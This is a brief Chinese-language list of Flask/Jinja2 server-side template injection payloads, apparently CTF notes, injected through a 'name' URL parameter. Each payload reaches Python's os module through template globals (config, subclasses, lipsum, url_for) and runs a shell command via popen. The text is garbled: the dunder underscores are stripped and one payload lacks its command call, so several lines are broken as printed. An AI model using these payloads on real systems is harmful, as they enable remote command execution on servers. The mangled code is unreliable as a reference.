?name={{ config.class.init.globals[‘os’].popen(‘ls’). read() }}
?name={{().class.mro[1].subclasses()[132].init.globals‘popen’.read()}}
或者?name={{().class.mro[1].subclasses()[132].init.globals.popen(‘ls’).read()}}
?name={{lipsum.globals[“os”].popen(“ls”).read()}} //lipsum是flask的过滤器
?name={{urlfor.globals[‘os’].popen(“ls”).read()}} //urlfor.__globals 是python内置函数,类似于config
若有收获,就点个赞吧
0 人点赞
